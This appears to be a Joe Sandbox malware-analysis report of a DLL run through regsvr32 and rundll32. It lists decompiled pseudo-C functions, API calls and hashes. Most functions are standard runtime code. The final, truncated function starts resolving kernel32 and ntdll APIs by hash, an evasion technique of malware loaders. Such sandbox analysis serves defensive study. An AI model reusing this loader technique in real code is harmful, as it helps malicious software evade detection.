                                                                        				signed int _t65;
                                                                        				signed int _t68;
                                                                        				signed char _t70;
                                                                        				char _t71;
                                                                        				signed int _t73;
                                                                        				signed int _t74;
                                                                        				signed char* _t78;
                                                                        				signed char* _t79;
                                                                        				void* _t81;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        
                                                                        				_t80 = __edi;
                                                                        				_t63 = __ebx;
                                                                        				_t42 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t42;
                                                                        				if(GetCPInfo( *0x10050b84,  &_v28) != 1) {
                                                                        					_t45 = 0;
                                                                        					__eflags = 0;
                                                                        					do {
                                                                        						__eflags = _t45 - 0x41;
                                                                        						if(_t45 < 0x41) {
                                                                        							L23:
                                                                        							__eflags = _t45 - 0x61;
                                                                        							if(_t45 < 0x61) {
                                                                        								L26:
                                                                        								 *(_t45 + 0x10050ba0) = 0;
                                                                        							} else {
                                                                        								__eflags = _t45 - 0x7a;
                                                                        								if(_t45 > 0x7a) {
                                                                        									goto L26;
                                                                        								} else {
                                                                        									 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000020;
                                                                        									_t68 = _t45 - 0x20;
                                                                        									goto L22;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t45 - 0x5a;
                                                                        							if(_t45 > 0x5a) {
                                                                        								goto L23;
                                                                        							} else {
                                                                        								 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000010;
                                                                        								_t68 = _t45 + 0x20;
                                                                        								__eflags = _t68;
                                                                        								L22:
                                                                        								 *(_t45 + 0x10050ba0) = _t68;
                                                                        							}
                                                                        						}
                                                                        						_t45 = _t45 + 1;
                                                                        						__eflags = _t45 - 0x100;
                                                                        					} while (_t45 < 0x100);
                                                                        				} else {
                                                                        					_t47 = 0;
                                                                        					do {
                                                                        						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
                                                                        						_t47 = _t47 + 1;
                                                                        					} while (_t47 < 0x100);
                                                                        					_t48 = _v22;
                                                                        					_v284 = 0x20;
                                                                        					if(_t48 != 0) {
                                                                        						_push(__ebx);
                                                                        						_t78 =  &_v21;
                                                                        						_push(__edi);
                                                                        						do {
                                                                        							_t65 =  *_t78 & 0x000000ff;
                                                                        							_t59 = _t48 & 0x000000ff;
                                                                        							if(_t59 <= _t65) {
                                                                        								_t73 = _t65 - _t59 + 1;
                                                                        								_t74 = _t73 >> 2;
                                                                        								_t81 = _t86 + _t59 - 0x118;
                                                                        								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
                                                                        								_t87 = _t87 + 0x18;
                                                                        								_t65 = 0;
                                                                        							}
                                                                        							_t79 =  &(_t78[1]);
                                                                        							_t48 =  *_t79;
                                                                        							_t78 =  &(_t79[1]);
                                                                        							_t96 = _t48;
                                                                        						} while (_t48 != 0);
                                                                        						_pop(_t80);
                                                                        						_pop(_t63);
                                                                        					}
                                                                        					_push(0);
                                                                        					_push( *0x10050a68);
                                                                        					_push( *0x10050b84);
                                                                        					_push( &_v1308);
                                                                        					_push(0x100);
                                                                        					_push( &_v284);
                                                                        					_push(1);
                                                                        					E1001843D(_t63, _t65, _t80, 0x100, _t96);
                                                                        					_push(0);
                                                                        					_push( *0x10050b84);
                                                                        					_push(0x100);
                                                                        					_push( &_v540);
                                                                        					_push(0x100);
                                                                        					_push( &_v284);
                                                                        					_push(0x100);
                                                                        					_push( *0x10050a68);
                                                                        					E10018081(_t63, _t80, 0x100, _t96);
                                                                        					_push(0);
                                                                        					_push( *0x10050b84);
                                                                        					_push(0x100);
                                                                        					_push( &_v796);
                                                                        					_push(0x100);
                                                                        					_push( &_v284);
                                                                        					_push(0x200);
                                                                        					_push( *0x10050a68);
                                                                        					E10018081(_t63, _t80, 0x100, _t96);
                                                                        					_t58 = 0;
                                                                        					do {
                                                                        						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
                                                                        						if((_t70 & 0x00000001) == 0) {
                                                                        							__eflags = _t70 & 0x00000002;
                                                                        							if((_t70 & 0x00000002) == 0) {
                                                                        								 *((char*)(_t58 + 0x10050ba0)) = 0;
                                                                        							} else {
                                                                        								 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000020;
                                                                        								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
                                                                        								goto L12;
                                                                        							}
                                                                        						} else {
                                                                        							 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000010;
                                                                        							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
                                                                        							L12:
                                                                        							 *((char*)(_t58 + 0x10050ba0)) = _t71;
                                                                        						}
                                                                        						_t58 = _t58 + 1;
                                                                        					} while (_t58 < 0x100);
                                                                        				}
                                                                        				return E100117AE(_t45, _v8);
                                                                        			}






























                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Info
                                                                        • String ID: $
                                                                        • API String ID: 1807457897-3032137957
                                                                        • Opcode ID: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                        • Instruction ID: 0aa4f3d34f00a4262c94cc47b2ead2c87a4a0533aa2425fc92cd258cd4020972
                                                                        • Opcode Fuzzy Hash: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                        • Instruction Fuzzy Hash: 304106B15043AC9FEB55CA68CC95BEE7BA8EF05304F2044E1E981DB162C7708AD5D791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E10021810(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				struct _WNDCLASSA _v44;
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				void* _t25;
                                                                        				intOrPtr _t37;
                                                                        				void* _t38;
                                                                        				struct HINSTANCE__* _t41;
                                                                        				CHAR* _t43;
                                                                        
                                                                        				_t38 = __ecx;
                                                                        				_t43 = E100373A5() + 0x7c;
                                                                        				_t25 = E100373B5();
                                                                        				_t37 = _a8;
                                                                        				_t41 =  *(_t25 + 8);
                                                                        				if(_t37 != 0 || _a12 != _t37) {
                                                                        					L4:
                                                                        					_push(_a16);
                                                                        					_push(_a12);
                                                                        					_push(_t37);
                                                                        					_push(_a4);
                                                                        					E10012068(_t37, _t38, __eflags, _t43, "Afx:%p:%x:%p:%p:%p", _t41);
                                                                        					goto L5;
                                                                        				} else {
                                                                        					_t49 = _a16 - _t37;
                                                                        					if(_a16 != _t37) {
                                                                        						goto L4;
                                                                        					}
                                                                        					_push(_a4);
                                                                        					E10012068(_t37, _t38, _t49, _t43, "Afx:%p:%x", _t41);
                                                                        					L5:
                                                                        					if(GetClassInfoA(_t41, _t43,  &_v44) == 0) {
                                                                        						_v44.style = _a4;
                                                                        						_v44.lpfnWndProc = DefWindowProcA;
                                                                        						_v44.cbWndExtra = 0;
                                                                        						_v44.cbClsExtra = 0;
                                                                        						_v44.lpszMenuName = 0;
                                                                        						_v44.hIcon = _a16;
                                                                        						_t40 = _a12;
                                                                        						_push( &_v44);
                                                                        						_v44.hInstance = _t41;
                                                                        						_v44.hCursor = _t37;
                                                                        						_v44.hbrBackground = _a12;
                                                                        						_v44.lpszClassName = _t43;
                                                                        						if(E10020B9B() == 0) {
                                                                        							E10028C0C(_t40);
                                                                        						}
                                                                        					}
                                                                        					return _t43;
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ClassInfo
                                                                        • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                        • API String ID: 3534257612-2801496823
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E100165C9() {
                                                                        				signed int _v8;
                                                                        				char _v12;
                                                                        				void* __ecx;
                                                                        				void* __esi;
                                                                        				CHAR* _t10;
                                                                        				signed int _t16;
                                                                        				signed int _t22;
                                                                        				CHAR* _t25;
                                                                        				signed int _t34;
                                                                        				intOrPtr _t45;
                                                                        
                                                                        				_push(_t27);
                                                                        				_t45 =  *0x10050cac; // 0x1
                                                                        				if(_t45 == 0) {
                                                                        					E10012D82();
                                                                        				}
                                                                        				 *0x1004f6fc = 0;
                                                                        				GetModuleFileNameA(0, 0x1004f5f8, 0x104);
                                                                        				_t10 =  *0x10050cb0; // 0x2f03388
                                                                        				 *0x1004f410 = 0x1004f5f8;
                                                                        				if(_t10 == 0) {
                                                                        					L4:
                                                                        					_t25 = 0x1004f5f8;
                                                                        				} else {
                                                                        					_t25 = _t10;
                                                                        					if( *_t10 == 0) {
                                                                        						goto L4;
                                                                        					}
                                                                        				}
                                                                        				E1001645D(_t25, 0,  &_v12, 0,  &_v8);
                                                                        				_t40 = _v8 << 2;
                                                                        				_t16 = E100107B6(_v12 + (_v8 << 2));
                                                                        				_t34 = _t16;
                                                                        				if(_t34 != 0) {
                                                                        					E1001645D(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
                                                                        					 *0x1004f3f4 = _v8 - 1;
                                                                        					 *0x1004f3f8 = _t34;
                                                                        					_t22 = 0;
                                                                        				} else {
                                                                        					_t22 = _t16 | 0xffffffff;
                                                                        				}
                                                                        				return _t22;
                                                                        			}














                                                                        APIs
                                                                        • ___initmbctable.LIBCMT ref: 100165DB
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104,00000000,?,?,?,?,?,1001125B,?,?,?,10011379,?,?), ref: 100165F3
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: FileModuleName___initmbctable
                                                                        • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                        • API String ID: 767393020-3922119987
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E10024C8E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, char* _a16, intOrPtr _a20) {
                                                                        				intOrPtr _v8;
                                                                        				char _v268;
                                                                        				intOrPtr _v272;
                                                                        				intOrPtr _v276;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t39;
                                                                        				int _t40;
                                                                        				void* _t50;
                                                                        				char* _t51;
                                                                        				intOrPtr _t52;
                                                                        				char* _t61;
                                                                        				signed int _t62;
                                                                        				CHAR* _t64;
                                                                        				signed int _t73;
                                                                        				void* _t74;
                                                                        				CHAR* _t82;
                                                                        				intOrPtr _t85;
                                                                        				intOrPtr _t87;
                                                                        
                                                                        				_t39 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t39;
                                                                        				_v272 = __ecx;
                                                                        				if(_a12 == 0) {
                                                                        					L10:
                                                                        					_t40 = 0;
                                                                        					__eflags = 0;
                                                                        					L11:
                                                                        					return E100117AE(_t40, _v8);
                                                                        				}
                                                                        				_t73 = _a8 << 2;
                                                                        				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t73)) - 0xc));
                                                                        				if(_t85 == 0) {
                                                                        					goto L10;
                                                                        				}
                                                                        				_t77 = _a4;
                                                                        				_t82 = E100017D0(_a4, _t85 + 1);
                                                                        				if(_t82 == 0) {
                                                                        					E1001CE3B(_t77);
                                                                        				}
                                                                        				_t74 = lstrcpynA;
                                                                        				lstrcpynA(_t82,  *( *((intOrPtr*)(_v272 + 8)) + _t73), _t85 + 1);
                                                                        				_t50 = E10038481(_t82, 0, 0);
                                                                        				_t51 = _a16;
                                                                        				_t87 = _t85 - _t50 + 1;
                                                                        				_v276 = _t87;
                                                                        				if(_t87 != _t51) {
                                                                        					L7:
                                                                        					_t52 = _v272;
                                                                        					__eflags =  *((intOrPtr*)(_t52 + 0x18)) - 0xffffffff;
                                                                        					if( *((intOrPtr*)(_t52 + 0x18)) != 0xffffffff) {
                                                                        						_a12 = _t87 + _t82;
                                                                        						E1002565C(_t82, 0x104, _t87 + _t82,  &_v268, 0x104);
                                                                        						__eflags = 0x104;
                                                                        						lstrcpynA(_a12,  &_v268, 0x104 - _v276);
                                                                        						E10024AA1(__eflags, _t82,  *((intOrPtr*)(_v272 + 0x18)), _a20);
                                                                        					}
                                                                        					goto L9;
                                                                        				} else {
                                                                        					_t61 = _t51 + _t82;
                                                                        					_a11 =  *((intOrPtr*)(_t87 + _t82));
                                                                        					_a16 = _t61;
                                                                        					 *_t61 = 0;
                                                                        					_t62 = lstrcmpiA(_a12, _t82);
                                                                        					asm("sbb eax, eax");
                                                                        					_t64 =  ~_t62 + 1;
                                                                        					_a12 = _t64;
                                                                        					 *((char*)(_t87 + _t82)) = _a11;
                                                                        					if(_t64 == 0) {
                                                                        						goto L7;
                                                                        					}
                                                                        					E1002565C(_t82, 0x104, _a16,  &_v268, 0x104);
                                                                        					lstrcpynA(_t82,  &_v268, 0x104);
                                                                        					L9:
                                                                        					E10006CE2(_t74, _a4, _t82, 0xffffffff);
                                                                        					_t40 = 1;
                                                                        					goto L11;
                                                                        				}
                                                                        			}






















                                                                        APIs
                                                                        • lstrcpynA.KERNEL32(00000000,?,?,?), ref: 10024CF7
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10024D25
                                                                        • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000104), ref: 10024D59
                                                                          • Part of subcall function 1002565C: GetFileTitleA.COMDLG32(?,?,00000000,00000000,00000104), ref: 1002568C
                                                                        • lstrcpynA.KERNEL32(00000000,?,?,?,?,00000104,00000000,00000000,00000000), ref: 10024D93
                                                                          • Part of subcall function 10024AA1: lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                          • Part of subcall function 10024AA1: lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                        Similarity
                                                                        • API ID: lstrcpyn$FileTitlelstrcmpilstrcpylstrlen
                                                                        • String ID:
                                                                        • API String ID: 1551867014-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10013EDE() {
                                                                        				signed int _t15;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        				intOrPtr* _t20;
                                                                        				void* _t24;
                                                                        				signed int _t26;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t30;
                                                                        
                                                                        				_t15 =  *0x10050a48; // 0x0
                                                                        				_t26 =  *0x10050a58; // 0x0
                                                                        				if(_t15 != _t26) {
                                                                        					L4:
                                                                        					_t27 =  *0x10050a4c; // 0x0
                                                                        					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
                                                                        					_t17 = HeapAlloc( *0x10050a60, 8, 0x41c4);
                                                                        					 *(_t30 + 0x10) = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
                                                                        						 *(_t30 + 0xc) = _t18;
                                                                        						if(_t18 != 0) {
                                                                        							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
                                                                        							 *_t30 = 0;
                                                                        							 *((intOrPtr*)(_t30 + 4)) = 0;
                                                                        							 *0x10050a48 =  *0x10050a48 + 1;
                                                                        							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
                                                                        							_t20 = _t30;
                                                                        						} else {
                                                                        							HeapFree( *0x10050a60, 0,  *(_t30 + 0x10));
                                                                        							goto L5;
                                                                        						}
                                                                        					} else {
                                                                        						L5:
                                                                        						_t20 = 0;
                                                                        					}
                                                                        					return _t20;
                                                                        				} else {
                                                                        					_t2 = _t26 * 4; // 0x50
                                                                        					_t24 = HeapReAlloc( *0x10050a60, 0,  *0x10050a4c, _t26 + _t2 + 0x50 << 2);
                                                                        					if(_t24 != 0) {
                                                                        						 *0x10050a58 =  *0x10050a58 + 0x10;
                                                                        						 *0x10050a4c = _t24;
                                                                        						_t15 =  *0x10050a48; // 0x0
                                                                        						goto L4;
                                                                        					} else {
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        • HeapReAlloc.KERNEL32(00000000,00000050,00000000,100144CF,00000000,?,00000000), ref: 10013F05
                                                                        • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,100144CF,00000000,?,00000000), ref: 10013F3E
                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10013F5C
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 10013F73
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeap$FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 3499195154-0
                                                                        • Opcode ID: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                        • Instruction ID: aeb6b17fbef21620812925e1521d5c5e2c0640cb2d2eb2dc13b54a0eeae557ec
                                                                        • Opcode Fuzzy Hash: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                        • Instruction Fuzzy Hash: D0116D346003659FE761CF19DCC5D1A7BB1FB81760710852DF156DA5B1C3719882DB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10037A1B(signed int _a4) {
                                                                        				struct _CRITICAL_SECTION* _t13;
                                                                        				signed int _t21;
                                                                        				intOrPtr* _t24;
                                                                        
                                                                        				if( *0x1004f350 == 0) {
                                                                        					E100379F7();
                                                                        				}
                                                                        				_t21 = _a4;
                                                                        				_t24 = 0x1004f158 + _t21 * 4;
                                                                        				if( *_t24 == 0) {
                                                                        					EnterCriticalSection(0x1004f19c);
                                                                        					if( *_t24 == 0) {
                                                                        						InitializeCriticalSection(0x1004f1b8 + (_t21 + _t21 * 2) * 8);
                                                                        						 *_t24 =  *_t24 + 1;
                                                                        					}
                                                                        					LeaveCriticalSection(0x1004f19c);
                                                                        				}
                                                                        				_t13 = 0x1004f1b8 + (_t21 + _t21 * 2) * 8;
                                                                        				EnterCriticalSection(_t13);
                                                                        				return _t13;
                                                                        			}







                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A49
                                                                        • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A5B
                                                                        • LeaveCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A64
                                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A76
                                                                          • Part of subcall function 100379F7: InitializeCriticalSection.KERNEL32(1004F19C,10037A29,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterInitialize$Leave
                                                                        • String ID:
                                                                        • API String ID: 713024617-0
                                                                        • Opcode ID: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                        • Instruction ID: b71c326a3937b492ac304e5451021ab9c1c46bd2d9d00a0dd2066787caa8deb7
                                                                        • Opcode Fuzzy Hash: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                        • Instruction Fuzzy Hash: EFF0493200026EEFD711EF95CC88A66B3ACFB85322F40082AE148C2022D734B556CAA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:3.1%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0.4%
                                                                        Total number of Nodes:228
                                                                        Total number of Limit Nodes:24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 341 10016dd6-10016de8 SetUnhandledExceptionFilter
                                                                        C-Code - Quality: 100%
                                                                        			E10016DD6() {
                                                                        				_Unknown_base(*)()* _t1;
                                                                        
                                                                        				_t1 = SetUnhandledExceptionFilter(E10016D88); // executed
                                                                        				 *0x1004f70c = _t1;
                                                                        				return 0;
                                                                        			}




                                                                        0x10016ddb
                                                                        0x10016de1
                                                                        0x10016de8

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00016D88), ref: 10016DDB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 0aa30ca264b0f9a5cf40b7665c776e521371a76379119d2d5b9024e220ba3caa
                                                                        • Instruction ID: 860c8d24a5751d164401ddec1a1de020cdd10d2ad02b80096470b608a28627d3
                                                                        • Opcode Fuzzy Hash: 0aa30ca264b0f9a5cf40b7665c776e521371a76379119d2d5b9024e220ba3caa
                                                                        • Instruction Fuzzy Hash: E0A02471501310CFF300CF715C4C4003F50DF47101301C014D100C7111DF3440405F00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 342 10016dea-10016df5 SetUnhandledExceptionFilter
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 10016DEF
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 866fa5084d223cfbc77dc57b5ae8d892812aabc08f322071eabba0974904f1fe
                                                                        • Instruction ID: f7546913759f097ca14aad0a20f134b0dcb5b1656803b28e894a55764d857528
                                                                        • Opcode Fuzzy Hash: 866fa5084d223cfbc77dc57b5ae8d892812aabc08f322071eabba0974904f1fe
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 41%
                                                                        			E10006120(void* __ebx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, signed int _a8) {
                                                                        				void* _v4;
                                                                        				void* _t36;
                                                                        				void* _t39;
                                                                        				void* _t40;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t43;
                                                                        				intOrPtr _t44;
                                                                        				intOrPtr _t45;
                                                                        				intOrPtr _t46;
                                                                        				intOrPtr _t47;
                                                                        				intOrPtr _t48;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				intOrPtr _t51;
                                                                        				intOrPtr _t52;
                                                                        				intOrPtr _t53;
                                                                        				intOrPtr _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t56;
                                                                        				intOrPtr _t57;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr _t61;
                                                                        				intOrPtr _t62;
                                                                        				intOrPtr _t63;
                                                                        				intOrPtr _t64;
                                                                        				struct HRSRC__* _t65;
                                                                        				signed int _t68;
                                                                        				signed int _t69;
                                                                        				void* _t77;
                                                                        				void* _t79;
                                                                        				intOrPtr _t83;
                                                                        				signed int _t85;
                                                                        				signed int _t96;
                                                                        				void* _t97;
                                                                        				signed int _t99;
                                                                        				signed int _t100;
                                                                        				signed int _t110;
                                                                        				signed int _t112;
                                                                        				signed int _t113;
                                                                        				long _t117;
                                                                        				signed int _t119;
                                                                        				void* _t121;
                                                                        				struct HRSRC__* _t123;
                                                                        				int _t124;
                                                                        				void* _t127;
                                                                        				struct HINSTANCE__* _t128;
                                                                        				signed int _t129;
                                                                        				void* _t133;
                                                                        				signed int _t138;
                                                                        				signed int _t149;
                                                                        				signed int _t152;
                                                                        				signed int _t157;
                                                                        				intOrPtr _t182;
                                                                        
                                                                        				if(_a8 != 1) {
                                                                        					L6:
                                                                        					return 1;
                                                                        				} else {
                                                                        					_t36 = E10005040(__edi);
                                                                        					_t181 = _t36;
                                                                        					if(_t36 != 0) {
                                                                        						_push(0x1003ce28);
                                                                        						E10011135(__ebx, __edi, __esi, __eflags);
                                                                        						__eflags = 0;
                                                                        						return 0;
                                                                        					} else {
                                                                        						_push(__ebx);
                                                                        						_push(__ebp);
                                                                        						_push(__esi);
                                                                        						_push(__edi);
                                                                        						_push(L"kernel32.dll");
                                                                        						_push(0x3801a8f2);
                                                                        						_push(0x1a322e2e);
                                                                        						_push(0x628ad09);
                                                                        						_push(0x31c6c0a1);
                                                                        						_push(0x28b4cee6);
                                                                        						 *0x1004b0d8 = 0;
                                                                        						 *0x1004b0dc = 0;
                                                                        						 *0x1004b0e0 = 0;
                                                                        						 *0x1004b0e8 = 0;
                                                                        						 *0x1004b0e4 = 0;
                                                                        						 *0x1004b0ec = 0;
                                                                        						 *0x1004b0f0 = 0;
                                                                        						_t39 = E10001E60(_t181);
                                                                        						_push(L"ntdll.dll");
                                                                        						_push(0x1c9cdc39);
                                                                        						_push(0x2d34cc91);
                                                                        						_push(0x118db97f);
                                                                        						_push(0x348b2998);
